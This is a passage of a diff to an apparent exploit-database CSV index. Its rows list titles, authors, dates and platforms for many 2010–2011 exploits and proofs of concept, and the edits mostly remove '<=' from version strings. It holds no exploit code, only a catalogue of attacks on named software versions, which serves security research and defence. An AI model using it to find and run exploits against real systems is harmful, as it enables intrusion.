Persistent Cross-Site Scripting",2010-11-27,ZonTa,php,webapps,0 15624,platforms/windows/local/15624.txt,"CA Internet Security Suite 2010 - KmxSbx.sys Kernel Pool Overflow (0Day)",2010-11-28,"Nikita Tarakanov",windows,local,0 15625,platforms/cgi/webapps/15625.txt,"Skeletonz CMS Permanent XSS",2010-11-28,Jbyte,cgi,webapps,0 @@ -13571,13 +13571,13 @@ id,file,description,date,author,platform,type,port 15635,platforms/windows/dos/15635.py,"Provj 5.1.5.5 - (m3u) Buffer Overflow PoC",2010-11-30,0v3r,windows,dos,0 15636,platforms/php/webapps/15636.txt,"Orbis CMS 1.0.2 - Arbitrary File Upload",2010-11-30,"Mark Stanislav",php,webapps,0 15637,platforms/php/webapps/15637.txt,"Link Protect 1.2 Persistent XSS Vulnerabilities",2010-11-30,"Shichemt Alen",php,webapps,0 -15638,platforms/php/webapps/15638.txt,"Duhok Forum <= 1.1 - Remote File Upload",2010-11-30,BrOx-Dz,php,webapps,0 -15639,platforms/php/webapps/15639.txt,"Pandora Fms <= 3.1 - Authentication Bypass",2010-11-30,"Juan Galiana Lara",php,webapps,0 -15640,platforms/php/webapps/15640.txt,"Pandora Fms <= 3.1 OS Command Injection",2010-11-30,"Juan Galiana Lara",php,webapps,0 -15641,platforms/php/webapps/15641.txt,"Pandora Fms <= 3.1 - SQL Injection",2010-11-30,"Juan Galiana Lara",php,webapps,0 +15638,platforms/php/webapps/15638.txt,"Duhok Forum 1.1 - Remote File Upload",2010-11-30,BrOx-Dz,php,webapps,0 +15639,platforms/php/webapps/15639.txt,"Pandora Fms 3.1 - Authentication Bypass",2010-11-30,"Juan Galiana Lara",php,webapps,0 +15640,platforms/php/webapps/15640.txt,"Pandora Fms 3.1 OS Command Injection",2010-11-30,"Juan Galiana Lara",php,webapps,0 +15641,platforms/php/webapps/15641.txt,"Pandora Fms 3.1 - SQL Injection",2010-11-30,"Juan Galiana Lara",php,webapps,0 16012,platforms/windows/dos/16012.html,"Google Chrome 8.0.552.237 - address Overflow DoS",2011-01-18,"Vuk Ivanovic",windows,dos,0 -15642,platforms/php/webapps/15642.txt,"Pandora Fms <= 3.1 - Blind SQL Injection",2010-11-30,"Juan Galiana Lara",php,webapps,0 -15643,platforms/php/webapps/15643.txt,"Pandora Fms <= 3.1 Path Traversal and LFI",2010-11-30,"Juan Galiana Lara",php,webapps,0 +15642,platforms/php/webapps/15642.txt,"Pandora Fms 3.1 - Blind SQL Injection",2010-11-30,"Juan Galiana Lara",php,webapps,0 +15643,platforms/php/webapps/15643.txt,"Pandora Fms 3.1 Path Traversal and LFI",2010-11-30,"Juan Galiana Lara",php,webapps,0 15644,platforms/php/webapps/15644.txt,"Eclime 1.1.2b - Multiple Vulnerabilities",2010-11-30,"High-Tech Bridge SA",php,webapps,0 15645,platforms/php/webapps/15645.txt,"enano CMS 1.1.7pl1 - Multiple Vulnerabilities",2010-11-30,"High-Tech Bridge SA",php,webapps,0 15646,platforms/php/webapps/15646.txt,"DynPG 4.2.0 - Multiple Vulnerabilities",2010-11-30,"High-Tech Bridge SA",php,webapps,0 @@ -13596,8 +13596,8 @@ id,file,description,date,author,platform,type,port 15660,platforms/php/webapps/15660.txt,"etomite 1.1 - Multiple Vulnerabilities",2010-12-02,"High-Tech Bridge SA",php,webapps,0 15661,platforms/asp/webapps/15661.txt,"Ananda Real Estate 3.4 - (list.asp) Multiple SQL Injection",2010-12-02,underground-stockholm.com,asp,webapps,0 15662,platforms/linux/remote/15662.txt,"ProFTPD 1.3.3c - Compromised Source Remote Root Trojan",2010-12-02,anonymous,linux,remote,21 -15663,platforms/windows/local/15663.py,"MediaCoder <= 0.7.5.4797 - (.m3u) Buffer Overflow (SEH)",2010-12-02,"Oh Yaw Theng",windows,local,0 -15664,platforms/ios/remote/15664.txt,"iOS iFTPStorage <= 1.3 - Directory Traversal",2010-12-03,XEL,ios,remote,0 +15663,platforms/windows/local/15663.py,"MediaCoder 0.7.5.4797 - (.m3u) Buffer Overflow (SEH)",2010-12-02,"Oh Yaw Theng",windows,local,0 +15664,platforms/ios/remote/15664.txt,"iOS iFTPStorage 1.3 - Directory Traversal",2010-12-03,XEL,ios,remote,0 15665,platforms/asp/webapps/15665.txt,"Easy Travel Portal 2 - (travelbycountry.asp) SQL Injection",2010-12-03,"Ulrik Persson",asp,webapps,0 15666,platforms/hardware/webapps/15666.txt,"Multiple D-Link Router Models Authentication Bypass",2010-12-03,"Craig Heffner",hardware,webapps,0 15668,platforms/windows/remote/15668.html,"Image Viewer CP Gold 6 - ActiveX TifMergeMultiFiles() Buffer Overflow",2010-12-03,Dr_IDE,windows,remote,0 @@ -13623,7 +13623,7 @@ id,file,description,date,author,platform,type,port 15689,platforms/windows/remote/15689.py,"Freefloat FTP Server - Buffer Overflow (0Day)",2010-12-05,0v3r,windows,remote,0 15690,platforms/asp/webapps/15690.txt,"SOOP Portal 2.0 - Remote Upload Shell",2010-12-05,Net.Edit0r,asp,webapps,0 15691,platforms/php/webapps/15691.txt,"Pulse CMS Basic - Local File Inclusion",2010-12-05,"Mark Stanislav",php,webapps,0 -15692,platforms/windows/local/15692.py,"Video Charge Studio <= 2.9.5.643 - (.vsc) Buffer Overflow (SEH)",2010-12-06,"xsploited security",windows,local,0 +15692,platforms/windows/local/15692.py,"Video Charge Studio 2.9.5.643 - (.vsc) Buffer Overflow (SEH)",2010-12-06,"xsploited security",windows,local,0 15693,platforms/windows/local/15693.html,"Viscom VideoEdit Gold ActiveX 8.0 - Remote Code Execution Exploit",2010-12-06,Rew,windows,local,0 15694,platforms/windows/dos/15694.txt,"Winzip 15.0 WZFLDVW.OCX Text Property Denial of Service",2010-12-06,"Fady Mohammed Osman",windows,dos,0 15695,platforms/windows/dos/15695.txt,"Winzip 15.0 WZFLDVW.OCX IconIndex Property Denial of Service",2010-12-06,"Fady Mohammed Osman",windows,dos,0 @@ -13631,15 +13631,15 @@ id,file,description,date,author,platform,type,port 15697,platforms/windows/dos/15697.html,"AVG Internet Security 2011 Safe Search for IE DoS",2010-12-06,Dr_IDE,windows,dos,0 15698,platforms/windows/dos/15698.html,"Flash Player - (Flash6.ocx) AllowScriptAccess DoS PoC",2010-12-06,Dr_IDE,windows,dos,0 15699,platforms/php/webapps/15699.txt,"phpMyAdmin - Client Side Code Injection and Redirect Link Falsification (0Day)",2010-12-06,"emgent white_sheep and scox",php,webapps,80 -15704,platforms/linux/local/15704.c,"Linux Kernel <= 2.6.37 (Redhat / Ubuntu 10.04) - 'Full-Nelson.c' Local Privilege Escalation (1)",2010-12-07,"Dan Rosenberg",linux,local,0 +15704,platforms/linux/local/15704.c,"Linux Kernel 2.6.37 (Redhat / Ubuntu 10.04) - 'Full-Nelson.c' Local Privilege Escalation (1)",2010-12-07,"Dan Rosenberg",linux,local,0 33671,platforms/php/webapps/33671.txt,"MySmartBB 1.7 - Multiple Cross-Site Scripting Vulnerabilities",2010-02-24,indoushka,php,webapps,0 15701,platforms/php/webapps/15701.txt,"MODx Revolution CMS 2.0.4-pl2 - Remote XSS POST Injection",2010-12-06,LiquidWorm,php,webapps,0 15703,platforms/asp/webapps/15703.txt,"SOOP Portal Raven 1.0b Shell Upload",2010-12-07,"Sun Army",asp,webapps,0 15705,platforms/linux/dos/15705.txt,"GNU inetutils 1.8-1 - FTP Client Heap Overflow",2010-12-07,Rew,linux,dos,0 15706,platforms/windows/local/15706.txt,"Winamp 5.6 - Arbitrary Code Execution in MIDI Parser",2010-12-08,"Kryptos Logic",windows,local,0 -15707,platforms/multiple/dos/15707.txt,"Wonderware InBatch <= 9.0sp1 - Buffer Overflow",2010-12-08,"Luigi Auriemma",multiple,dos,0 +15707,platforms/multiple/dos/15707.txt,"Wonderware InBatch 9.0sp1 - Buffer Overflow",2010-12-08,"Luigi Auriemma",multiple,dos,0 15708,platforms/windows/dos/15708.html,"Microsoft Internet Explorer 8 - CSS Parser Denial of Service",2010-12-08,WooYun,windows,dos,0 -15744,platforms/cgi/webapps/15744.txt,"Gitweb <= 1.7.3.3 - Cross-Site Scripting",2010-12-15,emgent,cgi,webapps,80 +15744,platforms/cgi/webapps/15744.txt,"Gitweb 1.7.3.3 - Cross-Site Scripting",2010-12-15,emgent,cgi,webapps,80 15745,platforms/linux/local/15745.txt,"IBM Tivoli Storage Manager (TSM) - Local Root",2010-12-15,"Kryptos Logic",linux,local,0 15710,platforms/multiple/webapps/15710.txt,"Apache Archiva 1.0 < 1.3.1 - CSRF",2010-12-09,"Anatolia Security",multiple,webapps,0 15711,platforms/php/webapps/15711.pl,"Abtp Portal Project 0.1.0 - LFI Exploit",2010-12-09,Br0ly,php,webapps,0 @@ -13660,17 +13660,17 @@ id,file,description,date,author,platform,type,port 15729,platforms/windows/local/15729.py,"PowerShell XP 3.0.1 - Buffer Overflow (0Day)",2010-12-12,m_101,windows,local,0 15730,platforms/windows/local/15730.rb,"SnackAmp 3.1.3 - SMP Buffer Overflow (SEH)",2010-12-12,"James Fitts",windows,local,0 15733,platforms/windows/remote/15733.html,"Crystal Reports Viewer 12.0.0.549 - ActiveX Exploit (PrintControl.dll) (0Day)",2010-12-14,Dr_IDE,windows,remote,0 -15735,platforms/php/webapps/15735.txt,"MantisBT <= 1.2.3 (db_type) - Cross-Site Scripting & Path Disclosure",2010-12-15,LiquidWorm,php,webapps,0 -15736,platforms/php/webapps/15736.txt,"MantisBT <= 1.2.3 (db_type) - Local File Inclusion",2010-12-15,LiquidWorm,php,webapps,0 +15735,platforms/php/webapps/15735.txt,"MantisBT 1.2.3 (db_type) - Cross-Site Scripting & Path Disclosure",2010-12-15,LiquidWorm,php,webapps,0 +15736,platforms/php/webapps/15736.txt,"MantisBT 1.2.3 (db_type) - Local File Inclusion",2010-12-15,LiquidWorm,php,webapps,0 15737,platforms/cgi/webapps/15737.txt,"Google Urchin 5.7.03 - LFI (0Day)",2010-12-15,"Kristian Erik Hermansen",cgi,webapps,0 15738,platforms/windows/dos/15738.pl,"Digital Audio Editor 7.6.0.237 - Local Crash PoC",2010-12-15,h1ch4m,windows,dos,0 15739,platforms/windows/dos/15739.pl,"Easy DVD Creator Local Crash PoC",2010-12-15,h1ch4m,windows,dos,0 15740,platforms/php/webapps/15740.txt,"Pointter PHP Content Management System - Unauthorized Privilege Escalation",2010-12-15,"Mark Stanislav",php,webapps,0 15741,platforms/php/webapps/15741.txt,"Pointter PHP Micro-Blogging Social Network - Unauthorized Privilege Escalation",2010-12-15,"Mark Stanislav",php,webapps,0 15742,platforms/php/webapps/15742.txt,"BEdita 3.0.1.2550 - Multiple Vulnerabilities",2010-12-15,"High-Tech Bridge SA",php,webapps,0 -15743,platforms/php/webapps/15743.txt,"BLOG:CMS <= 4.2.1e - Multiple Vulnerabilities",2010-12-15,"High-Tech Bridge SA",php,webapps,0 +15743,platforms/php/webapps/15743.txt,"BLOG:CMS 4.2.1e - Multiple Vulnerabilities",2010-12-15,"High-Tech Bridge SA",php,webapps,0 15746,platforms/windows/remote/15746.rb,"Microsoft Internet Explorer 8 - CSS Parser Exploit",2010-12-15,"Nephi Johnson",windows,remote,0 -15747,platforms/windows/local/15747.py,"Aesop GIF Creator <= 2.1 - (.aep) Buffer Overflow Exploit",2010-12-16,xsploitedsec,windows,local,0 +15747,platforms/windows/local/15747.py,"Aesop GIF Creator 2.1 - (.aep) Buffer Overflow Exploit",2010-12-16,xsploitedsec,windows,local,0 15748,platforms/php/webapps/15748.txt,"QualDev eCommerce script SQL Injection",2010-12-16,ErrNick,php,webapps,0 15749,platforms/php/webapps/15749.txt,"Joomla JRadio Component (com_jradio) Local File Inclusion",2010-12-16,Sid3^effects,php,webapps,0 15750,platforms/windows/dos/15750.py,"SolarFTP 2.0 - Multiple Commands Denial of Service",2010-12-16,modpr0be,windows,dos,0 @@ -13700,7 +13700,7 @@ id,file,description,date,author,platform,type,port 15777,platforms/asp/webapps/15777.txt,"Oto Galery 1.0 - Multiple SQL Injection Vulnerabilities",2010-12-19,"DeadLy DeMon",asp,webapps,0 15779,platforms/php/webapps/15779.txt,"Joomla JE Auto Component (com_jeauto) LFI",2010-12-19,Sid3^effects,php,webapps,0 15781,platforms/php/webapps/15781.txt,"Inout Webmail Script Persistent XSS",2010-12-20,Sid3^effects,php,webapps,0 -15782,platforms/windows/local/15782.pl,"Word Splash Pro <= 9.5 - Buffer Overflow",2010-12-20,h1ch4m,windows,local,0 +15782,platforms/windows/local/15782.pl,"Word Splash Pro 9.5 - Buffer Overflow",2010-12-20,h1ch4m,windows,local,0 15783,platforms/php/webapps/15783.txt,"MaticMarket 2.02 for PHP-Nuke - LFI",2010-12-20,xer0x,php,webapps,0 15784,platforms/asp/webapps/15784.txt,"Elcom CommunityManager.NET Auth Bypass",2010-12-20,"Sense of Security",asp,webapps,0 15785,platforms/windows/local/15785.py,"MP3 CD Converter Professional BoF (SEH)",2010-12-20,"C4SS!0 G0M3S",windows,local,0 @@ -13722,7 +13722,7 @@ id,file,description,date,author,platform,type,port 15801,platforms/php/webapps/15801.txt,"Joomla Component com_xgallery 1.0 - Local File Inclusion",2010-12-21,KelvinX,php,webapps,0 15802,platforms/windows/remote/15802.txt,"ecava integraxor 3.6.4000.0 - Directory Traversal",2010-12-21,"Luigi Auriemma",windows,remote,0 15805,platforms/hardware/dos/15805.php,"Apple iPhone Safari (JS .) Remote Crash",2010-12-22,"Yakir Wizman",hardware,dos,0 -15804,platforms/php/webapps/15804.txt,"jobappr <= 1.4 - Multiple Vulnerabilities",2010-12-21,giudinvx,php,webapps,0 +15804,platforms/php/webapps/15804.txt,"jobappr 1.4 - Multiple Vulnerabilities",2010-12-21,giudinvx,php,webapps,0 15806,platforms/linux/remote/15806.txt,"Citrix Access Gateway - Command Injection",2010-12-22,"George D. Gal",linux,remote,0 15807,platforms/cgi/webapps/15807.txt,"Mitel AWC Unauthenticated Command Execution",2010-12-22,Procheckup,cgi,webapps,0 15808,platforms/php/webapps/15808.txt,"WORDPRESS Plugin Accept Signups 0.1 - XSS",2010-12-22,clshack,php,webapps,0 @@ -13733,7 +13733,7 @@ id,file,description,date,author,platform,type,port 15813,platforms/php/webapps/15813.txt,"IPN Development Handler 2.0 - Multiple Vulnerabilities",2010-12-23,"AtT4CKxT3rR0r1ST ",php,webapps,0 15814,platforms/php/webapps/15814.txt,"Joomla Component com_ponygallery - Remote File Inclusion Vulnerabilities",2010-12-23,"AtT4CKxT3rR0r1ST ",php,webapps,0 15815,platforms/php/webapps/15815.txt,"Joomla Component com_adsmanager Remote File Inclusion",2010-12-23,"AtT4CKxT3rR0r1ST ",php,webapps,0 -15816,platforms/php/webapps/15816.txt,"CubeCart <= 3.0.4 - SQL Injection",2010-12-23,Dr.NeT,php,webapps,0 +15816,platforms/php/webapps/15816.txt,"CubeCart 3.0.4 - SQL Injection",2010-12-23,Dr.NeT,php,webapps,0 15818,platforms/php/webapps/15818.txt,"iDevSpot iDevCart 1.10 - Multiple Local File Inclusion Vulnerabilities",2010-12-24,v3n0m,php,webapps,0 15819,platforms/php/webapps/15819.txt,"Joomla Component com_xmovie 1.0 - Local File Inclusion",2010-12-24,KelvinX,php,webapps,0 15820,platforms/php/webapps/15820.txt,"SquareCMS 0.3.1 - (post.php) SQL Injection",2010-12-24,cOndemned,php,webapps,0 @@ -13751,7 +13751,7 @@ id,file,description,date,author,platform,type,port 15834,platforms/windows/remote/15834.py,"Kolibri 2.0 - Buffer Overflow RET + SEH Exploit (HEAD)",2010-12-26,TheLeader,windows,remote,0 15835,platforms/php/webapps/15835.html,"pecio CMS 2.0.5 - CSRF Add Admin",2010-12-27,"P0C T34M",php,webapps,0 15836,platforms/php/webapps/15836.txt,"OpenEMR 3.2.0 - SQL Injection and XSS",2010-12-27,blake,php,webapps,0 -15837,platforms/php/webapps/15837.txt,"Web@all <= 1.1 - Remote Admin Settings Change",2010-12-27,"Giuseppe D'Inverno",php,webapps,0 +15837,platforms/php/webapps/15837.txt,"Web@all 1.1 - Remote Admin Settings Change",2010-12-27,"Giuseppe D'Inverno",php,webapps,0 15839,platforms/windows/dos/15839.php,"Microsoft Windows Fax Services Cover Page Editor (.cov) Memory Corruption",2010-12-28,rgod,windows,dos,0 15840,platforms/php/webapps/15840.txt,"ardeaCore 2.25 - PHP Framework Remote File Inclusion",2010-12-29,n0n0x,php,webapps,0 15842,platforms/hardware/remote/15842.txt,"DD-WRT 24-preSP2 - Information Disclosure",2010-12-29,"Craig Heffner",hardware,remote,0 @@ -13761,7 +13761,7 @@ id,file,description,date,author,platform,type,port 15848,platforms/php/webapps/15848.txt,"PHP-AddressBook 6.2.4 - (group.php) SQL Injection",2010-12-29,hiphop,php,webapps,0 15845,platforms/windows/dos/15845.py,"IrfanView 4.27 - JP2000.dll plugin DoS",2010-12-29,BraniX,windows,dos,0 15849,platforms/php/webapps/15849.txt,"LoveCMS 1.6.2 - CSRF Code Injection",2010-12-29,hiphop,php,webapps,0 -15850,platforms/php/webapps/15850.html,"PiXie CMS <= 1.04 - Multiple CSRF Vulnerabilities",2010-12-29,"Ali Raheem",php,webapps,0 +15850,platforms/php/webapps/15850.html,"PiXie CMS 1.04 - Multiple CSRF Vulnerabilities",2010-12-29,"Ali Raheem",php,webapps,0 15851,platforms/windows/dos/15851.py,"QuickTime Picture Viewer 7.6.6 JP2000 - Denial of Service",2010-12-29,BraniX,windows,dos,0 15852,platforms/php/webapps/15852.txt,"Siteframe 3.2.3 - (user.php) SQL Injection",2010-12-29,"AnGrY BoY",php,webapps,0 15853,platforms/php/webapps/15853.txt,"DGNews 2.1 - SQL Injection",2010-12-29,kalashnikov,php,webapps,0 @@ -13783,24 +13783,24 @@ id,file,description,date,author,platform,type,port 15885,platforms/windows/remote/15885.html,"HP Photo Creative 2.x audio.Record.1 - ActiveX Control Remote Stack Based Buffer Overflow",2011-01-01,rgod,windows,remote,0 15886,platforms/php/webapps/15886.txt,"KLINK SQL Injection",2011-01-01,"Mauro Rossi and Andres Gomez",php,webapps,0 15895,platforms/windows/local/15895.py,"CoolPlayer 2.18 - DEP Bypass",2011-01-02,blake,windows,local,0 -15887,platforms/php/webapps/15887.txt,"ChurchInfo <= 1.2.12 SQL Injection",2011-01-01,dun,php,webapps,0 +15887,platforms/php/webapps/15887.txt,"ChurchInfo 1.2.12 SQL Injection",2011-01-01,dun,php,webapps,0 15888,platforms/windows/local/15888.c,"Bywifi 2.8.1 - Stack Buffer Overflow Exploit",2011-01-01,anonymous,windows,local,0 -15889,platforms/php/webapps/15889.txt,"Sahana Agasti <= 0.6.4 - SQL Injection",2011-01-01,dun,php,webapps,0 +15889,platforms/php/webapps/15889.txt,"Sahana Agasti 0.6.4 - SQL Injection",2011-01-01,dun,php,webapps,0 15890,platforms/php/webapps/15890.txt,"Tech Shop Technote 7 - SQL Injection",2011-01-01,MaJ3stY,php,webapps,0 15891,platforms/php/webapps/15891.txt,"GALLARIFIC PHP Photo Gallery Script (gallery.php) SQL Injection",2011-01-02,"AtT4CKxT3rR0r1ST ",php,webapps,0 15892,platforms/php/webapps/15892.html,"YourTube 1.0 - CSRF (Add User)",2011-01-02,"AtT4CKxT3rR0r1ST ",php,webapps,0 15893,platforms/php/webapps/15893.py,"amoeba CMS 1.01 - Multiple Vulnerabilities",2011-01-02,mr_me,php,webapps,0 15894,platforms/windows/dos/15894.c,"Windows - Class Handling (MS10-073)",2011-01-02,"Tarjei Mandt",windows,dos,0 18245,platforms/multiple/remote/18245.py,"Splunk Remote Root Exploit",2011-12-15,"Gary O'Leary-Steele",multiple,remote,0 -15896,platforms/php/webapps/15896.txt,"Sahana Agasti <= 0.6.4 - Multiple Remote File Inclusion",2011-01-03,n0n0x,php,webapps,0 +15896,platforms/php/webapps/15896.txt,"Sahana Agasti 0.6.4 - Multiple Remote File Inclusion",2011-01-03,n0n0x,php,webapps,0 15897,platforms/windows/dos/15897.py,"Music Animation Machine MIDI Player Local Crash PoC",2011-01-03,c0d3R'Z,windows,dos,0 15898,platforms/multiple/dos/15898.py,"Wireshark ENTTEC DMX Data RLE Buffer Overflow",2011-01-03,"non-customers crew",multiple,dos,0 15902,platforms/php/webapps/15902.html,"S40 CMS 0.4.1 Change Admin Passwd CSRF Exploit",2011-01-04,pentesters.ir,php,webapps,0 15901,platforms/windows/local/15901.py,"Music Animation Machine MIDI Player SEH BOF",2011-01-04,Acidgen,windows,local,0 15905,platforms/windows/dos/15905.py,"Xynph 1.0 USER Denial of Service Exploit",2011-01-04,freak_out,windows,dos,0 15991,platforms/windows/remote/15991.html,"Real Networks RealPlayer SP 'RecordClip' Method Remote Code Execution",2011-01-14,"Sean de Regge",windows,remote,0 -15907,platforms/php/webapps/15907.txt,"Nucleus 3.61 - Multiple Remote File Include",2011-01-05,n0n0x,php,webapps,0 -15913,platforms/php/webapps/15913.pl,"PhpGedView <= 4.2.3 - Local File Inclusion",2011-01-05,dun,php,webapps,0 +15907,platforms/php/webapps/15907.txt,"Nucleus 3.61 - Multiple Remote File Inclusion",2011-01-05,n0n0x,php,webapps,0 +15913,platforms/php/webapps/15913.pl,"PhpGedView 4.2.3 - Local File Inclusion",2011-01-05,dun,php,webapps,0 15961,platforms/php/webapps/15961.txt,"TinyBB 1.2 - SQL Injection",2011-01-10,Aodrulez,php,webapps,0 15918,platforms/jsp/webapps/15918.txt,"Openfire 3.6.4 - Multiple CSRF Vulnerabilities",2011-01-06,"Riyaz Ahemed Walikar",jsp,webapps,0 15916,platforms/linux/local/15916.c,"Linux Kernel < 2.6.34 (Ubuntu 10.10 x86) - 'CAP_SYS_ADMIN' Local Privilege Escalation Exploit (1)",2011-01-05,"Dan Rosenberg",linux,local,0 @@ -13809,24 +13809,24 @@ id,file,description,date,author,platform,type,port 15921,platforms/php/webapps/15921.txt,"phpMySport 1.4 - (SQLi & Auth Bypass & Path Disclosure) Multiple Vulnerabilities",2011-01-06,"High-Tech Bridge SA",php,webapps,0 15922,platforms/php/webapps/15922.txt,"Phenotype CMS 3.0 - SQL Injection",2011-01-06,"High-Tech Bridge SA",php,webapps,0 15923,platforms/php/webapps/15923.txt,"PHP MicroCMS 1.0.1 - CSRF and XSS Vulnerabilities",2011-01-06,"High-Tech Bridge SA",php,webapps,0 -15924,platforms/php/webapps/15924.txt,"openSite 0.2.2 beta - Local File Inclusion Vulnerbility",2011-01-07,n0n0x,php,webapps,0 +15924,platforms/php/webapps/15924.txt,"openSite 0.2.2 beta - Local File Inclusion",2011-01-07,n0n0x,php,webapps,0 15925,platforms/windows/dos/15925.txt,"StageTracker 2.5 - Denial of Service",2011-01-07,freak_out,windows,dos,0 15957,platforms/windows/remote/15957.py,"KingView 6.5.3 SCADA HMI Heap Overflow PoC",2011-01-09,"Dillon Beresford",windows,remote,0 15934,platforms/windows/local/15934.py,"BS.Player 2.57 - Buffer Overflow Exploit (Unicode SEH)",2011-01-07,"C4SS!0 G0M3S",windows,local,0 15935,platforms/linux/dos/15935.c,"GNU libc/regcomp(3) - Multiple Vulnerabilities",2011-01-07,"Maksymilian Arciemowicz",linux,dos,0 -15936,platforms/windows/local/15936.py,"VideoSpirit Pro <= 1.68 - Local BoF Exploit",2011-01-08,xsploitedsec,windows,local,0 +15936,platforms/windows/local/15936.py,"VideoSpirit Pro 1.68 - Local BoF Exploit",2011-01-08,xsploitedsec,windows,local,0 15937,platforms/multiple/remote/15937.pl,"NetSupport Manager Agent - Remote Buffer Overflow (1)",2011-01-08,ikki,multiple,remote,0 -15938,platforms/php/webapps/15938.txt,"axdcms-0.1.1 - Local File Include Vulnerbility",2011-01-08,n0n0x,php,webapps,0 -15939,platforms/php/webapps/15939.txt,"Elxis CMS 2009.2 - Remote file include vulnerbility",2011-01-08,n0n0x,php,webapps,0 +15938,platforms/php/webapps/15938.txt,"axdcms-0.1.1 - Local File Inclusion",2011-01-08,n0n0x,php,webapps,0 +15939,platforms/php/webapps/15939.txt,"Elxis CMS 2009.2 - Remote File Inclusion",2011-01-08,n0n0x,php,webapps,0 15940,platforms/windows/dos/15940.pl,"HP Data Protector Manager 6.11 - Remote DoS in RDS Service",2011-01-08,Pepelux,windows,dos,0 15941,platforms/windows/local/15941.py,"Winamp 5.5.8 (in_mod plugin) - Stack Overflow Exploit (SEH)",2011-01-08,fdiskyou,windows,local,0 -15942,platforms/php/webapps/15942.txt,"sahana agasti <= 0.6.5 - Multiple Vulnerabilities",2011-01-08,dun,php,webapps,0 -15943,platforms/php/webapps/15943.txt,"WordPress Plugin mingle forum <= 1.0.26 - Multiple Vulnerabilities",2011-01-08,"Charles Hooper",php,webapps,0 +15942,platforms/php/webapps/15942.txt,"sahana agasti 0.6.5 - Multiple Vulnerabilities",2011-01-08,dun,php,webapps,0 +15943,platforms/php/webapps/15943.txt,"WordPress Plugin mingle forum 1.0.26 - Multiple Vulnerabilities",2011-01-08,"Charles Hooper",php,webapps,0 15944,platforms/linux/local/15944.c,"Linux Kernel < 2.6.34 (Ubuntu 10.10 x86/x64) - 'CAP_SYS_ADMIN' Local Privilege Escalation Exploit (2)",2011-01-08,"Joe Sylve",linux,local,0 -15945,platforms/php/webapps/15945.txt,"Zwii 2.1.1 - Remote File Inclusion Vulnerbility",2011-01-08,"Abdi Mohamed",php,webapps,0 +15945,platforms/php/webapps/15945.txt,"Zwii 2.1.1 - Remote File Inclusion",2011-01-08,"Abdi Mohamed",php,webapps,0 16123,platforms/hardware/remote/16123.txt,"Comcast DOCSIS 3.0 Business Gateways - Multiple Vulnerabilities",2011-02-06,"Trustwave's SpiderLabs",hardware,remote,0 15946,platforms/windows/dos/15946.py,"IrfanView 4.28 - Multiple Denial of Service Vulnerabilities",2011-01-09,BraniX,windows,dos,0 -15958,platforms/php/webapps/15958.txt,"Joomla Captcha Plugin <= 4.5.1 - Local File Disclosure",2011-01-09,dun,php,webapps,0 +15958,platforms/php/webapps/15958.txt,"Joomla Captcha Plugin 4.5.1 - Local File Disclosure",2011-01-09,dun,php,webapps,0 15959,platforms/windows/dos/15959.pl,"Macro Express Pro 4.2.2.1 MXE File Syntactic Analysis Buffer Overflow PoC",2011-01-10,LiquidWorm,windows,dos,0 15960,platforms/php/webapps/15960.txt,"Maximus CMS 1.1.2 - (fckeditor) Arbitrary File Upload",2011-01-10,eidelweiss,php,webapps,0 15962,platforms/solaris/local/15962.c,"Linux Kernel (Solaris 10 / < 5.10 138888-01) - Local Root Exploit",2011-01-10,peri.carding,solaris,local,0 @@ -13838,7 +13838,7 @@ id,file,description,date,author,platform,type,port 15966,platforms/php/webapps/15966.txt,"ExtCalendar 2 - (calendar.php) SQL Injection",2011-01-11,"Lagripe-Dz and Mca-Crb",php,webapps,0 15967,platforms/php/webapps/15967.txt,"energine 2.3.8 - Multiple Vulnerabilities",2011-01-11,"High-Tech Bridge SA",php,webapps,0 15971,platforms/php/webapps/15971.txt,"whCMS 0.115 - CSRF",2011-01-11,"High-Tech Bridge SA",php,webapps,0 -15972,platforms/windows/local/15972.c,"DriveCrypt <= 5.3 - Local Kernel ring0 SYSTEM Exploit",2011-01-11,mu-b,windows,local,0 +15972,platforms/windows/local/15972.c,"DriveCrypt 5.3 - Local Kernel ring0 SYSTEM Exploit",2011-01-11,mu-b,windows,local,0 15973,platforms/multiple/dos/15973.txt,"Wireshark - ZigBee ZCL Dissector Infinite Loop Denial of Service",2011-01-11,"Fred Fierling",multiple,dos,0 15974,platforms/linux/dos/15974.txt,"Mono/Moonlight Generic Type Argument - Local Privilege Escalation",2011-01-11,"Chris Howie",linux,dos,0 16264,platforms/windows/local/16264.pl,"Magic Music Editor - Buffer Overflow Exploit",2011-03-02,"C4SS!0 G0M3S",windows,local,0 @@ -13852,13 +13852,13 @@ id,file,description,date,author,platform,type,port 16020,platforms/php/webapps/16020.txt,"PHP Lowbids viewfaqs.php Blind SQL Injection",2011-01-20,"BorN To K!LL",php,webapps,0 15988,platforms/windows/dos/15988.py,"Objectivity/DB Lack of Authentication Remote Exploit",2011-01-14,"Jeremy Brown",windows,dos,0 15989,platforms/php/webapps/15989.txt,"People Joomla Component 1.0.0 - SQL Injection",2011-01-14,"Salvatore Fresta",php,webapps,0 -15992,platforms/windows/dos/15992.txt,"Sielco Sistemi Winlog <= 2.07.00 - Stack Overflow",2011-01-14,"Luigi Auriemma",windows,dos,0 +15992,platforms/windows/dos/15992.txt,"Sielco Sistemi Winlog 2.07.00 - Stack Overflow",2011-01-14,"Luigi Auriemma",windows,dos,0 15993,platforms/php/webapps/15993.html,"viart shop 4.0.5 - CSRF",2011-01-15,Or4nG.M4N,php,webapps,0 15994,platforms/windows/local/15994.rb,"eXtremeMP3 Player - Buffer Overflow (SEH)",2011-01-15,"C4SS!0 G0M3S",windows,local,0 15995,platforms/php/webapps/15995.txt,"glfusion CMS 1.2.1 - Stored XSS via img tag",2011-01-15,Saif,php,webapps,0 15996,platforms/php/webapps/15996.txt,"compactcms 1.4.1 - Multiple Vulnerabilities",2011-01-15,NLSecurity,php,webapps,0 15997,platforms/jsp/webapps/15997.py,"MeshCMS 3.5 - Remote Code Execution Exploit",2011-01-16,mr_me,jsp,webapps,0 -15998,platforms/windows/dos/15998.txt,"Kingsoft AntiVirus 2011 SP5.2 KisKrnl.sys <= 2011.1.13.89 - Local Kernel Mode DoS Exploit",2011-01-16,MJ0011,windows,dos,0 +15998,platforms/windows/dos/15998.txt,"Kingsoft AntiVirus 2011 SP5.2 KisKrnl.sys 2011.1.13.89 - Local Kernel Mode DoS Exploit",2011-01-16,MJ0011,windows,dos,0 15999,platforms/php/webapps/15999.txt,"BetMore Site Suite 4 - (bid) Blind SQL Injection",2011-01-16,"BorN To K!LL",php,webapps,0 16002,platforms/windows/dos/16002.html,"ActiveX UserManager 2.03 - Buffer Overflow",2011-01-16,blake,windows,dos,0 